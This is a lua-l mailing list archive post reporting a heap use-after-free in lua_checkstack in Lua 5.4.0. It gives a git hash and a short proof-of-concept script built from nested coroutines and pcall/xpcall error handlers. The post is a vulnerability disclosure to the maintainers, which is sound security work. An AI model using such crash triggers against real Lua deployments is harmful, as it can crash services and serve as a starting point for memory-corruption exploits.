 |
lua-l archive |
|
|
||
|
Hi, We found a heap use after free in lua_checkstack. Here’s the POC: function errfunc() pcall(4) do coroutine.resume(coroutine.create( function() do local a function errfunc() a = {} loadstring 'fail' end coroutine.wrap(function() print( xpcall(test, errfunc)) end)() coro() end end))() end end(function() print(xpcall(test, errfunc)) end)() Lua version 5.4.0, git hash 34affe7a63fc5d842580a9f23616d057e17dfe27 Sent from Mail for Windows 10 |